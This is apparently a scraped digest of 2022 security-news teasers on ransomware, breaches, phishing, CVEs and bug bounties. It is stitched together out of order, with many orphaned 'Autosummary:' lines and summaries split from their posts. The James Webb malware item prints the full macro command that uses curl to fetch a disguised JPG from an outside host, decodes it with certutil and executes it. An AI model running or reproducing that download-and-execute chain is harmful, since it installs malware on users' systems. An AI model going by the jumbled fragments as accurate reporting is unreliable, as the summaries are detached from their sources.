9-in-10 CIOs say that their role and responsibilities have expanded beyond technology, including non-traditional areas such as data analytics and business reporting (56%), sustainability/ESG (45%), DE&I (42%), HR/talent acquisition (39%), and sales/marketing (32%). Similarly in the UK, 9-in-10 CIOs say that their role and responsibilities have expanded beyond technology, including non-traditional areas such as digital transformation and business process automation (62%), data analytics and business reporting (57%), DE&I (42%), and HR/talent acquisition (58%). "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Uptycs researchers recently spotted a new Linux ransomware that appears to be under active development. The Uptycs Threat Research team recently observed an Executable and Linkable Format (ELF) ransomware which encrypts the files inside Linux systems based on the given folder path. We observed that the dropped README note matches exactly with the DarkAngels ransomware […]
The post Another Ransomware For Linux Likely In Development appeared first on Security Affairs.
"Autosummary:
Figure 3: pthread usage inside the ransomware binary The start_routine()(FUN_0041cf55) (see Figure 4) function performs the following steps to encrypt target files: Opens the target file and sets the write lock on it using fcntl(). "Researchers attribute the Raspberry Robin malware to the Russian cybercrime group known as Evil Corp group. IBM Security X-Force researchers discovered similarities between a component used in the Raspberry Robin malware and a Dridex malware loader, which was part of the malicious operations of the cybercrime gang Evil Corp. Raspberry Robin is a Windows worm discovered […]
The post Experts link Raspberry Robin Malware to Evil Corp cybercrime gang appeared first on Security Affairs.
"Autosummary:
In many cases, the infection process led to the deployment of custom Cobalt Strike loaders attributed to DEV-0243, which falls under activities tracked by the experts “EvilCorp,” Now IBM Security X-Force researchers announced to have found evidence that Evil Corp is likely using Raspberry Robin infrastructure to carry out its attacks. "Autosummary:
DarkEye Telegram token and ID, and active keylogger code (Zscaler) In addition, the malware author configures the builder to drop and execute LodaRAT, an old (2017) yet powerful trojan, that enables remote actors to take control of the infected system, steal information, fetch additional payloads, etc. "Autosummary:
"Autosummary:
Damart homepage as seen on August 15, 2022 At that time, following a request for comment from BleepingComputer, Damart stated the following: "Damart, the mail order clothing brand, based in Bingley, West Yorkshire, has confirmed that there was an attempt to intrude into their IT systems, which they were rapidly able to intercept with strong security protocols. "Autosummary:
"The information-stealing malware Prynt Stealer contains a backdoor that allows stealing the data it has infiltrated from victims. Zscaler researchers discovered Telegram channel-based backdoor in the information stealing malware, Prynt Stealer, which allows to secretly steal a copy of the data exfiltrated from the victims. “Zscaler ThreatLabz researchers have uncovered the Prynt Stealer builder, also […]
The post The Prynt Stealer malware contains a secret backdoor. Crooks steal data from other cybercriminals appeared first on Security Affairs.
"Autosummary:
“Zscaler ThreatLabz researchers have uncovered the Prynt Stealer builder, also attributed with WorldWind, and DarkEye, has a secret backdoor in the code that ends up in every derivative copy and variant of these malware families.” reads the analysis published by Zscaler. "Autosummary:
August 17th CVE-2022-2294 - July 4th CVE-2022-1364 - April 14th CVE-2022-1096 - March 25th "Autosummary:
The attackers say that the stolen files contain confidential data, including contracts, reports, project information, accounting documents, and other internal documentation. "Autosummary:
Damart homepage as seen on August 15, 2022 At that time, following a request for comment from BleepingComputer, Damart stated the following: "Damart, the mail order clothing brand, based in Bingley, West Yorkshire, has confirmed that there was an attempt to intrude into their IT systems, which they were rapidly able to intercept with strong security protocols. "Electronics giant Samsung has confirmed a new data breach after some of its US systems were compromised in July. After the attack that hit the company in late July 2022, Samsung disclosed a data breach. The Electronics giant discovered on August 4 that threat actors have had access to its systems and exfiltrated customer personal […]
The post Samsung discloses a second data breach this year appeared first on Security Affairs.
"Autosummary:
The company states that customers have no immediate action to do to mitigate the potential impacts of the incident, anyway it recommends that its customers: Remain cautious of any unsolicited communications that ask for your personal information or refer you to a web page asking for personal information Avoid clicking on links or downloading attachments from suspicious emails Review their accounts for suspicious activity In March 2020, Samsung disclosed another data breach after it was hit by an attack conducted by the data extortion group Lapsus$. Threat actors had access to internal company data, including the source code of Galaxy models. "In this interview for Help Net Security, Katie Taitler, Senior Cybersecurity Strategista at Axonius, talks about cyber threats in the energy sector and what should be improved to make sure this sector is properly guarded. We have witnessed numerous cyberattacks on the energy sector in the past few years. What could be the consequences of such attacks? Attacks on the energy sector are often a show of power that are meant to cause large-scale disruption. … More
The post Dealing with cyber threats in the energy sector: Are we on the right path? appeared first on Help Net Security.
"Autosummary:
It always starts with the fundamentals and knowing your baselines: what technology do you have, where is it, what state is it in, how can it be attacked, what vulnerabilities might criminals take advantage of, can they be patched, what are the priorities?Energy organizations need to devote time and energy, and collaborate better with the private sector, to seek out research, best practices, and establish improved information sharing among organizations. "Given inflation and economic uncertainty, the cybersecurity industry is starting to experience budget cuts, despite a surge in ransomware attacks. As more budgets are going under the microscope, and in some cases, on the chopping block, one of the best ways for security leaders to protect their program is to ensure alignment with their executive teams and boards. In this Help Net Security video, Andrew Hollister, CSO at LogRhythm, talks about measuring the effectiveness of … More
The post 7 metrics to measure the effectiveness of your security operations appeared first on Help Net Security.
"Autosummary:
"Are inadequate security policies for privileged access making you highly vulnerable to security breaches and ransomware attacks? In the weeks that followed the high-profile attack on the SolarWinds supply chain, it became clear that the threat actors infiltrated the company’s internal networks and cloud infrastructure through unrestricted privileged access. Once inside the network, they were able to move laterally in the system. This attack and many others reinforce the importance of an effective Privileged Access … More
The post How Just-in-Time privilege elevation prevents data breaches and lateral movement appeared first on Help Net Security.
"Autosummary:
A typical cyber attack chain Address compliance According to the Gartner report: Reduce Risk Through a Just-in-Time Approach to Privileged Access Management, “By the year 2025, 75% of cyber insurance providers will mandate the use of JIT PAM principles.”We must eliminate broad and discretionary access, remove accounts with standing privileges, enforce least privilege, and enable JIT access request workflows for legitimate time-bound access.Since JIT privilege elevation eliminates standing privileges, many IT tasks are also eliminated, such as credential rotation, privileged access expiration, and account deletion. "Autosummary:
"Autosummary:
"The filtering takes place on the server-side and the decision to load or reject a URL is based on the reply received from a particular HTTP GET request," Valsamaras explained, adding the static analysis "indicated that it is possible to bypass the server-side check by adding two additional parameters to the deeplink. "A team of cybersecurity experts from the US FBI will help the authorities in Montenegro to investigate the recent massive cyberattack. A team of cybersecurity experts from the FBI is heading to Montenegro to help local authorities in investigating the recent massive cyber attack that hit the government infrastructure last week. “This is another confirmation […]
The post FBI is helping Montenegro in investigating the ongoing cyberattack appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On The term “Hybrid warfare” refers to a military strategy which employs political warfare and blends conventional warfare, irregular warfare and cyberwarfare with other influencing methods, such as fake news, diplomacy, lawfare and foreign electoral intervention. "Apple released new security updates for older iPhone and iPad devices addressing recently fixed WebKit zero-day. Apple has released new updates to backport patches released this month to older iPhone and iPad devices addressing the CVE-2022-32893 flaw. The CVE-2022-32893 flaw is an out-of-bounds issue that impacts WebKit. An attacker can trigger the flaw by tricking target devices into processing maliciously crafted web […]
The post Apple released patches for recently disclosed WebKit zero-day in older iPhones and iPads appeared first on Security Affairs.
"Autosummary:
"Autosummary:
The second step in the phishing process (Vade) The first form requests “username”, the second asks the victim to enter “name”, “email”, and “phone number”, while the third and final step requests entering the user “password”, to supposedly verify that they own the account. "Autosummary:
According to Cyble, which detailed the modus operandi of the ransomware earlier this month, targeted companies span several industry sectors such as media, banking, energy, manufacturing, education, healthcare, and professional services. "The Ragnar Locker ransomware gang claims to have hacked the Portuguese state-owned flag carrier airline TAP Air Portugal and stolen customers’ data. The Ragnar Locker ransomware added the Portuguese state-owned flag carrier airline TAP Air Portugal to its leak site and claims to have stolen customers’ data. On August 26, the Portugues company announced via […]
The post Ragnar Locker ransomware gang claims to have stolen data from TAP Air Portugal appeared first on Security Affairs.
"Autosummary:
The ransomware group published screenshots of the stolen data, which allegedly includes names, addresses, email addresses, phone numbers, corporate IDs, travel information, nationality, gender, and other personal information. "Autosummary:
"The ransomware would use the NTRUEncrypt public key encryption algorithm, targeting log files (.log), executable files (.exe), dynamic library files (.dll), swap files (.vswp), virtual disks (. vmdk), snapshot (.vmsn) files, and virtual machine memory (.vmem) files, among others," - Chile CSIRT According to CSIRT, the malware used in this attack also had functions for stealing credentials from web browsers, list removable devices for encryption, and evade antivirus detection using execution timeouts. "Autosummary:
"Categories: News Tags: Apple Tags: iOS 12.5.6 Tags: webkit Tags: CVE-2022-32893 Apple has released a security update for iOS 12.5.6 to patch a remotely exploitable WebKit vulnerability that allows attackers to execute arbitrary code on unpatched devices. |
The post Apple releases security update for iPhones and iPads to address vulnerability appeared first on Malwarebytes Labs.
"Autosummary:
Owners of an iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, or iPod touch (6th generation) can use the update function on the device or use iTunes to update the software to iOS 12.5.6. "Categories: News Tags: Exploit Tags: vulnerability Tags: Tik-Tok Tags: Microsoft Tags: JavaScript We take a look at a TikTok exploit discovered by Microsoft and passed on to the social media giant to have fixed. |
The post TikTok vulnerability could have allowed hijackers to take over accounts appeared first on Malwarebytes Labs.
"Autosummary:
Fixes and suggestions Microsoft has the following advice for app developers required to dabble with JavaScript interfaces: Use the default browser to open URLs that don’t belong to the application’s approved list. The perils of JavaScript interface injection Exploitation was dependent on how the app implemented JavaScript interfaces, provided by something called WebView in the Android operating system which is used to load and display web pages. "Apple this week released urgent security updates to address zero-day vulnerabilities on older model iPhones, iPads, and iPods.
The patches, pushed out on Wednesday, address an out-of-bounds write issue that could be exploited by an attacker enabling them to take control of the affected device. The US Cybersecurity and Infrastructure Agency (CISA) today encouraged users and IT admins to review Apple’s advisory HT213428 and apply the necessary updates.
Autosummary:
“The issue is that if a web page is constructed in a certain way, it can cause code to execute on the device outside of the normal containment and effectively create a malware situation on the device that could compromise data, contacts, location, insert malicious SW, etc.,” said Jack Gold, principal analyst at J. Gold Associates, LLC. "Barracuda released its fourth-annual threat research report which looks at ransomware attack patterns that occurred between August 2021 and July 2022. A closer look at ransomware attack patterns For the 106 highly publicized attacks our researchers analyzed, the dominant targets are still five key industries: education (15%), municipalities (12%), healthcare (12%), infrastructure (8%), and financial (6%): The number of ransomware attacks increased year-over-year across each of these five industry verticals, and attacks against other industries … More
The post Ransomware gangs’ favorite targets appeared first on Help Net Security.
"Autosummary:
"Several U.S. states have recently moved to ban local and state agencies and organizations funded by taxpayers’ dollars from paying off ransomware gangs, and a few more are gearing up to it. In this Help Net Security video interview, Alex Iftimie, Partner at Morrison & Foerster (MoFo), talks about the possible repercussions of such legislation and, in general, about the evolving nature of ransomware attacks and the current global efforts aimed at fighting the ransomware … More
The post Should ransomware payments be banned? A few considerations appeared first on Help Net Security.
"Autosummary:
"A vulnerability assessment is a methodical examination of network infrastructure, computer systems, and software with the goal of identifying and addressing known security flaws. Once the vulnerabilities are pinpointed, they are classified based on how critical it is to fix/mitigate them sooner rather than later. Usually, the vulnerability scanning tool also provides instructions on how to remediate or mitigate the discovered flaws. Security teams can use the findings of a vulnerability assessment to better understand … More
The post 5 open-source vulnerability assessment tools to try out appeared first on Help Net Security.
"Autosummary:
"Google wants to improve the security of its open source projects and those projects’ third-party dependencies by offering rewards for bugs found in them. “Depending on the severity of the vulnerability and the project’s importance, rewards will range from $100 to $31,337. The larger amounts will also go to unusual or particularly interesting vulnerabilities, so creativity is encouraged,” Googlers Francis Perron and Krzysztof Kotowicz explained. Google offers rewards for bugs in its open source software … More
The post Google invites bug hunters to scrutinize its open source projects appeared first on Help Net Security.
"Autosummary:
The latest versions of open source software stored in the public repositories of Google-owned GitHub organizations, and selected repositories hosted on other platforms Repository configuration settings (e.g., GitHub actions, access control rules, GitHub application configurations) Vulnerabilities in third-party dependencies (if they can be triggered or exploited in Google open source projects) “First and foremost, we welcome submissions pointing out vulnerabilities affecting source or build integrity that could result in a supply chain compromise. "Autosummary:
"Autosummary:
"The Russian subscription-based streaming service Start discloses a data breach affecting 7.5 million users. The Russian media streaming platform START disclosed a data breach that impacted 7.5 millions of its users. According to the company, the attackers stole a 2021 database from its infrastructure and also shared a samples online to demonstrate the authenticity of […]
The post Russian streaming platform Start discloses a data breach impacting 7.5M users appeared first on Security Affairs.
"Autosummary:
“As follows from the leak, 24.6 million Start users registered from Russia, 2.3 million from Kazakhstan, 2.1 million from China, and 1.7 million from Ukraine.” "Autosummary:
"Autosummary:
"While you"re navigating a web page, the page can, without your knowledge, erase the current contents of your system clipboard, which may have been valuable to you, and replace them with anything the page wants, which could be dangerous to you the next time you paste. "Autosummary:
Ragnar Locker also shared a screenshot of a spreadsheet containing what looks like customer information stolen from TAP"s servers, including names, dates of birth, emails, and addresses. "A malware campaign tracked as GO#WEBBFUSCATOR used an image taken from NASA’s James Webb Space Telescope (JWST) as a lure. Securonix Threat researchers uncovered a persistent Golang-based malware campaign tracked as GO#WEBBFUSCATOR that leveraged the deep field image taken from the James Webb telescope. The phishing emails contain a Microsoft Office attachment that includes an external reference […]
The post GO#WEBBFUSCATOR campaign hides malware in NASA’s James Webb Space Telescope image appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Secureworks announced the expansion of its alliances program into several new solution areas. With threats expanding into critical production environments and the service edge, detection capabilities must expand, too. Through two new partners, Netskope and SCADAfence, Secureworks widens the range of potential security vulnerabilities addressed by Secureworks Taegis XDR to include Secure Access Service Edge (SASE), Operational Technology (OT), and Industrial Control Systems (ICS). Now, more organizations than ever can benefit from better detection with … More
The post Secureworks partners with Netskope and SCADAfence to protect users against threats appeared first on Help Net Security.
"Autosummary:
“Hybrid work is the new normal, and our customers look for complete SASE solutions to enable performance, deliver data, protect against threats, and maximize return-on-investment,” said Andy Horwitz, VP of Business Development at Netskope. "Italian oil giant Eni was hit by a cyber attack, attackers compromised its computer networks, but the consequences appear to be minor. Italian oil giant company Eni disclosed a security breach, threat actors gained access to its network, but according to the company the intrusion had minor consequences because it was quickly detected. “The internal […]
The post Threat actors breached the network of the Italian oil company ENI appeared first on Security Affairs.
"Autosummary:
Last year, Alpharetta, Georgia-based Colonial Pipeline Co. shut the largest fuel pipeline in the US after a ransomware attack crippled its IT systems, and in February, Hamburg, Germany-based oil trader Mabanaft said it was the victim of a cyberattack that disrupted the delivery of fuels across Germany. "Categories: Business Malwarebytes Endpoint Protection continues to receive outstanding results in third-party testing: We"re proud to have been one of the top-ranked security solutions by two highly-regarded industry evaluations, MRG-Effitas and Info-Tech’s Data Quadrant Report. |
The post Malwarebytes receives highest rankings in recent third-party tests appeared first on Malwarebytes Labs.
"Autosummary:
Malwarebytes Endpoint Protection blocked a wide range of ransomware, fileless attacks and other threats: 100 percent of “in the wild” threats blocked : Tested malware considered as ‘zero-day’, delivered by URLs 100 percent of ransomware blocked : Tested ‘in-house’ ransomware samples in-house (no possibly known signatures or community verdicts) 100 percent of financial malware blocked : Tested financial malware used in the Magecart credit card-skimming attack 100 percent of fileless attacks blocked : Tested to see how security products protect against a specific exploitation technique 100 percent of PUA/adware blocked: Tested potentially unwanted applications (PUA), that are not malicious, but are generally considered unsuitable for most home or business networks. "Categories: News Categories: Threats Tags: Msdllupdate.exe Tags: macros Tags: James Webb Tags: certutil Tags: Golang Tags: base64 Tags: steganography Tags: OxB36F8GEEC634.jpg In a recent malware campaign, images from the James Webb telescope were used to hide malware. |
The post James Webb telescope images used to hide malware appeared first on Malwarebytes Labs.
"Autosummary:
Certificate The obfuscated code in the macro executes the following command: cmd.exe /c cd c:\users\{username}\appdata\local & curl http://www.xmlschemeformat.com/update/2021/office/oxb36f8geec634.jpg -o oxb36f8geec634.jpg & certutil -decode oxb36f8geec634.jpg msdllupdate.exe & msdllupdate.exe This command will download a file named OxB36F8GEEC634.jpg, use certutil.exe to decode it into a binary called msdllupdate.exe and then finally, execute that binary. In the command we saw how the legitimate certutil was used to decode the so-called certificate and create a binary called msdllupdate.exe. Payload The malware payload copies itself into %localappdata%\microsoft\vault\ and creates and executes a batch file in the same folder called update.bat. "Categories: News Categories: Scams We take a look at multiple reports of Final Fantasy 14 players attacked by a wave of QR themed phishing. |
The post Final Fantasy 14 players targeted by QR code phishing appeared first on Malwarebytes Labs.
"Autosummary:
* On a legitimate website operated by SQUARE ENIX CO., LTD., no other pages apart from login pages will require password entry, nor will any of our staff ever ask you for your password. Please also be aware of the following methods used to direct players to fake pages: ・Using FFXIV in-game chat to direct players to fake pages imitating Square Enix websites, including the Support Center, the Lodestone, and the official FINAL FANTASY XIV Forums. The developers write: As we have mentioned in the past, we have confirmed that certain individuals are attempting to direct players to fake login websites which imitate the Square Enix Account Management System in an effort to steal (also known as “phishing”) information such as their Square Enix ID and password, as well as date of birth. "A global research commissioned by Cohesity reveals that nearly half of respondents say their company depends on outdated, legacy backup and recovery infrastructure to manage and protect their data. In some cases, this technology is more than 20 years old and was designed long before today’s multicloud era and onslaught of sophisticated cyberattacks plaguing enterprises globally. Challenges pertaining to outdated infrastructure could easily be compounded by the fact that many IT and security teams don’t … More
The post Outdated infrastructure not up to today’s ransomware challenges appeared first on Help Net Security.
"Autosummary:
The findings are as follows (respondents were asked to check all that apply): integration between IT and security systems (41%) lack of coordination between IT and Security (38%) lack of an automated disaster recovery system (34%) antiquated backup and recovery systems (32%) lack of a recent, clean, immutable copy of data (32%) lack of and timely detailed alerts (31%) With respect to the lack of coordination between IT and Security, this coincides with other findings from this survey denoting that a gap often exists between IT and SecOps that puts businesses and security postures at risk. "Autosummary:
"Radware released a report revealing that the number of malicious DDoS attacks climbed by 203% compared to the first six months of 2021. This Help Net Security video provides information about the rise of DDoS activity launched by patriotic hacktivists.
The post DDoS activity launched by patriotic hacktivists is on the rise appeared first on Help Net Security.
"Autosummary:
"Baker & Taylor, one of the world’s largest distributors of books, revealed that it was hit by a ransomware attack. Baker & Taylor, one of the world’s largest distributors of books worldwide, suffered a ransomware attack on August 23. The incident impacted the company’s phone systems, offices, and service centers. On August 24, the company […]
The post World’s largest distributors of books Baker & Taylor hit by ransomware appeared first on Security Affairs.
"Autosummary:
"Autosummary:
Category Flagship OSS projects Standard OSS projects Supply chain compromises $3,133.7 - $31,337 $1,337 - $13,337 Product vulnerabilities $500 - $7,500 $101 - $3,133.7 Other security issues $1,000 $500 "Before you start, please see the program rules for more information about out-of-scope projects and vulnerabilities, then get hacking and let us know what you find. "Researchers spotted three campaigns delivering multiple malware, including ModernLoader, RedLine Stealer, and cryptocurrency miners Cisco Talos researchers observed three separate, but related, campaigns between March and June 2022 that were delivering multiple malware, including the ModernLoader bot (aka Avatar bot), RedLine info-stealer and cryptocurrency miners to victims. ModernLoader is a .NET remote access trojan that […]
The post Three campaigns delivering multiple malware, including ModernLoader and XMRig miner appeared first on Security Affairs.
"Autosummary:
Researchers spotted three campaigns delivering multiple malware, including ModernLoader, RedLine Stealer, and cryptocurrency miners Cisco Talos researchers observed three separate, but related, campaigns between March and June 2022 that were delivering multiple malware, including the ModernLoader bot (aka Avatar bot), RedLine info-stealer and cryptocurrency miners to victims. "Autosummary:
Browser fingerprinting: identifies and analyzes victim’s browser technical capabilities Peer connection: implements WebRTC to real-time communication over APIs Security check: checks if Kaspersky security tools are installed on the victim’s machine Once the framework has been assembled on the victim’s machine and the selected plugins are loaded, it sets up command and control (C2) communications and begins sending victim profile data, technical details, and information useful for reconnaissance and basic espionage. "Autosummary:
"Are you aware of the perils of the world’s no. 1 social media? Do you know how to avoid scams and stay safe on TikTok?
The post TikShock: Don’t get caught out by these 5 TikTok scams appeared first on WeLiveSecurity
"Autosummary:
Furthermore, while in an app that people are scrolling minute after minute, even hour after hour, scams can easily catch people off guard and often make them lose money, their account, or even their reputation.Pretty sure I’ve just got a Phishing scam text via someone texting via actual tiktok pic.twitter.com/UCGhsoWz56 — Carrie Walsh (@carrie_walsh_) August 17, 2022 Bot accounts TikTok is, unfortunately, still full of bot accounts that cleverly interact with users in a way that make the targeted users think they are chatting with a real person. "Google this week launched a new bug bounty program that covers the open source projects of the IT giant. Google launched a new bug bounty program as part of the new Open Source Software Vulnerability Rewards Program (OSS VRP) that covers the source projects of the IT giant. The company will pay up to $31,337 […]
The post A new Google bug bounty program now covers Open Source projects appeared first on Security Affairs.
"Autosummary:
Google encourages white hat hackers and bug hunters to submit vulnerabilities that lead to supply chain compromise, design issues, and other security issues such as sensitive or leaked credentials, weak passwords, or insecure installations Follow me on Twitter: @securityaffairs and Facebook Pierluigi Paganini (SecurityAffairs – hacking, bug bounty) "Autosummary:
Obfuscated VBS macro (left) and decoded command to download the JPG file (right) (Securonix) In an image viewer, the .JPG shows the galaxy cluster SMACS 0723, published by NASA in July 2022. "Autosummary:
One discrepancy between START’s statement and the leaked dump is that the latter contains md5crypt-hashed passwords, IP addresses, login logs, and subscription details, which have not been included in the official statement from the platform. "Categories: News Tags: social media Tags: twitter Tags: luggage Tags: airline Tags: terminal Tags: scam Tags: fake Tags: fraud Tags: send money Fake customer support accounts are extracting cash from people looking for some help on Twitter. |
The post British Airways customers targeted in lost luggage Twitter scam appeared first on Malwarebytes Labs.
"Autosummary:
Lose your luggage, find a fraud People posting about missing luggage on Twitter quickly found their replies filling up with offers to help from a non-verified account purporting to be British Airways. Avoiding the luggage assistance fakers Here are some things you should do, and be aware of, when in transit. "Vulnerability disclosures impacting IoT devices increased by 57% in the first half (1H) of 2022 compared to the previous six months, according to a research by Claroty. The report also found that over the same time period, vendor self-disclosures increased by 69%, becoming more prolific reporters than independent research outfits for the first time, and fully or partially remediated firmware vulnerabilities increased by 79%, a notable improvement given the relative challenges in patching firmware versus … More
The post Rise in IoT vulnerability disclosures, up 57% appeared first on Help Net Security.
"Autosummary:
Vendor self-disclosures: For the first time, vendor self-disclosures (29%) have surpassed independent research outfits (19%) as the second most prolific vulnerability reporters, after third-party security companies (45%). "Resecurity announced its partnership with ECOMIL SAS to expand Resecurity’s AI-driven cybersecurity solutions and threat intelligence services to Colombia. Based in Bogotá, Colombia, ECOMIL SAS provides cybersecurity, IT management and networking solutions to enterprise and government customers in Colombia. Colombia is rapidly transforming to a digital economy, where remote work has exploded 400% post pandemic. The transition to a digital economy has increased the threat of cyber-attacks, which increased 59% in the first half of … More
The post Resecurity partners with ECOMIL SAS to improve cybersecurity for Colombian organizations appeared first on Help Net Security.
"Autosummary:
"Modern aircraft are more connected now than they ever have been. The results have been rewards like faster flight turnarounds, greater fuel efficiency, and more comfortable and enjoyable passenger experiences. Underpinning all of this technology, however, is operational technology: the digital components inside aircraft that allow the sensors and actuators inside of them to interact with one another and fly passengers safely. This operational technology was designed in an era with safety and reliability at … More
The post The complexity of modern aircraft cybersecurity appeared first on Help Net Security.
"Autosummary:
"Critical Insight announced the release of the firm’s H1 2022 Healthcare Data Breach Report, which analyzes breach data reported to the United States Department of Health and Human Services by healthcare organizations. With the healthcare industry continuing to be a top attack vector for cybercriminals and ransomware threat groups, H1 2022 saw an interesting change in targets as attackers moved from large hospital systems and payers, big targets that would likely yield the most data … More
The post Attackers changing targets from large hospitals to specialty clinics appeared first on Help Net Security.
"Autosummary:
With the healthcare industry continuing to be a top attack vector for cybercriminals and ransomware threat groups, H1 2022 saw an interesting change in targets as attackers moved from large hospital systems and payers, big targets that would likely yield the most data but also have more sophisticated defenses, to smaller hospital systems and specialty clinics that lack the same level of security preparedness, staff size, or budget. "Autosummary:
Among other actively exploited flaws added to the list are as follows - CVE-2022-26352 - dotCMS Unrestricted Upload of File Vulnerability - dotCMS Unrestricted Upload of File Vulnerability CVE-2022-24706 - Apache CouchDB Insecure Default Initialization of Resource Vulnerability - Apache CouchDB Insecure Default Initialization of Resource Vulnerability CVE-2022-24112 - Apache APISIX Authentication Bypass Vulnerability - Apache APISIX Authentication Bypass Vulnerability CVE-2022-22963 - VMware Tanzu Spring Cloud Function Remote Code Execution Vulnerability - VMware Tanzu Spring Cloud Function Remote Code Execution Vulnerability CVE-2022-2294 - WebRTC Heap Buffer Overflow Vulnerability - WebRTC Heap Buffer Overflow Vulnerability CVE-2021-39226 - Grafana Authentication Bypass Vulnerability - Grafana Authentication Bypass Vulnerability CVE-2020-36193 "The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added 10 new flaws to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added 10 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, including a high-severity security flaw (CVE-2021-38406 CVSS score: 7.8) impacting Delta Electronics industrial automation software. According to Binding Operational Directive (BOD) 22-01: […]
The post CISA adds 10 new flaws to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.
"Autosummary:
The other vulnerabilities added to the catalog are: CVE-2022-26352 – dotCMS Unrestricted Upload of File Vulnerability – dotCMS Unrestricted Upload of File Vulnerability CVE-2022-24706 – Apache CouchDB Insecure Default Initialization of Resource Vulnerability – Apache CouchDB Insecure Default Initialization of Resource Vulnerability CVE-2022-24112 – Apache APISIX Authentication Bypass Vulnerability – "Scammers used a deepfake AI hologram of the Binance chief communications officer for fraudulent activities. Patrick Hillmann, chief communications officer of Binance, confirmed that scammers used his Deepfake AI hologram to trick users into online meetings and target the projects of clients of the company. Hillmann explained in a blog post that the attack was […]
The post Scammers used a deepfake AI hologram of Binance executive to scam crypto projects appeared first on Security Affairs.
"Autosummary:
"Autosummary:
Targets include electricity and water supply systems, transportation services, online portals that citizens use to access various state services, and more. "Autosummary:
The information that could be harvested by Facebook apps, according to Bright, was extensive and including “about me, actions, activities, b-day, check-ins, education, events, games, groups, hometown, interests, likes, location, notes, online status, tags, photos, questions, relationships, religion/politics, status, subscriptions, website, work history.” "Autosummary:
Overview of cryptocurrency theft (Chainalysis) In April, the FBI linked the hack of Axie Infinity"s Ronin network bridge, now the largest crypto hack ever, to the Lazarus and BlueNorOff (aka APT38) North Korean threat groups. "Autosummary:
"Autosummary:
Firewall rule to exempt malware communications from scrutiny (Check Point) Now that the device has been prepped for the final payload, the program loads the last dropper, which fetches another RAR file containing the XMRig mining malware, its controller, and a ".sys" file that has its settings. "Autosummary:
"Categories: News Tags: twilio Tags: okta Tags: Authy Tags: Signal Tags: Cloudflare Tags: MailChimp Tags: Klaviyo Tags: scatter swine Tags: oktapus Tags: 2fa Tags: otp Even if you don"t know a thing about Twilio, you may have been affected by their data breach. |
The post Twilio data breach turns out to be more elaborate than suspected appeared first on Malwarebytes Labs.
"Autosummary:
In a first update, Twilio, a cloud-based communication platform provider, revealed that the attackers also compromised the accounts of some users of Authy, its two-factor authentication (2FA) app. "Trend Micro researchers warn of a new ransomware family called Agenda, which has been used in attacks on organizations in Asia and Africa. Trend Micro researchers recently discovered a new piece of targeted ransomware, tracked as Agenda, that was written in the Go programming language. The ransomware was employed in a targeted attack against one of […]
The post New Agenda Ransomware appears in the threat landscape appeared first on Security Affairs.
"Autosummary:
Agenda reboots the victim’s machine in safe mode and then encrypt files upon reboot, a technique adopted by other ransomware gangs REvil, The threat actor gained access via RDP to Active Directory using leaked accounts, then used scanning tools Nmap.exe and Nping.exe for scanning the network. "Thoma Bravo: Securing digital identities has become a major priority In this Help Net Security interview, Andrew Almeida, Partner on the Flagship team at Thoma Bravo, talks about the firm’s recent acquisition of SailPoint, and about innovation in the enterprise identity space. Critical RCE bug in GitLab patched, update ASAP! (CVE-2022-2884) GitLab has fixed a remote code execution vulnerability (CVE-2022-2884) affecting the Community and the Enterprise Edition of its DevOps platform, and has urged admins … More
The post Week in review: RCE bug in GitLab patched, phishing PyPI users, Escanor malware in MS Office docs appeared first on Help Net Security.
"Autosummary:
What businesses can do to anticipate and mitigate ransomware threats In this Help Net Security video, Kevin Holvoet, Cyber Threat Intelligence Instructor, SANS Institute, discusses ransomware and Ransomware as a Service (Raas) attacks, and illustrates how preparedness with a proper top-down response is critical for business continuity in case of an attack. New infosec products of the week: August 26, 2022 Here’s a look at the most interesting products from the past week, featuring releases from Drata, Ntrinsec, PlainID, Privitar, and ReasonLabs. "The Python Package Index (PyPI) warns of an ongoing phishing campaign to steal developer credentials and distribute malicious updates. The Python Package Index, PyPI, this week warned of an ongoing phishing campaign that aims to steal developer credentials and inject malicious updates to the packages in the repository. “Today we received reports of a phishing […]
The post Experts warn of the first known phishing attack against PyPI appeared first on Security Affairs.
"Autosummary:
“The phishing attempt and the malicious packages are linked by the domain linkedopports[.]com, which appears in the malicious package code and also functions as the location to which the phishing site tries to send the stolen credentials.” reads the analysis published by Checkmarx. "Autosummary:
LockBit getting into DDoS Earlier this week, LockBitSupp, the public-facing figure of the LockBit ransomware operation, announced that the group is back in business with a larger infrastructure to give access to leaks unfazed by DDoS attacks. "Leaked documents show the surveillance firm Intellexa offering exploits for iOS and Android devices for $8 Million. Intellexa is an Israeli surveillance firm founded by Israeli entrepreneur Tal Dilian, it offers surveillance and hacking solution to law enforcement and intelligence agencies. The Vx-undergroud researchers shared some images of several confidential documents that appear to be […]
The post Surveillance firm’s leaked docs show the purchase of an $8M iOS RCE zero-day exploit appeared first on Security Affairs.
"Autosummary:
Leaked documents online show the purchase (and documentation of) an $8,000,000 iOS Remote Code Execution 0day exploit pic.twitter.com/lhmc8QdfGv — vx-underground (@vxunderground) August 24, 2022 The leaked documentation demonstrates that the company offers services for remote data extraction from Android and iOS devices. "Autosummary:
Additionally, Okta advises the following: Use Network Zones to deny or perform step-up authentication on requests from rarely-used networks and anonymizing proxies Restrict access to applications to only registered devices or devices managed by endpoint management tools Restrict access to the most sensitive applications and data using application-specific authentication policies For customers that want to look for Scatter Swine SMS events (e.g. authentication challenges, password resets or factor enrollment events), Okta has provided a system log query that reveals new devices and network locations for a particular user. "Autosummary:
"The state Infrastructure of Montenegro was hit by a massive and “unprecedented” cyber attack, authorities announced. An unprecedented cyber attack hit the Government digital infrastructure in Montenegro, the government has timely adopted measures to mitigate its impact. Montenegro immediately reported the attack to other members of the NATO alliance. “Certain services were switched off temporarily […]
The post Unprecedented cyber attack hit State Infrastructure of Montenegro appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
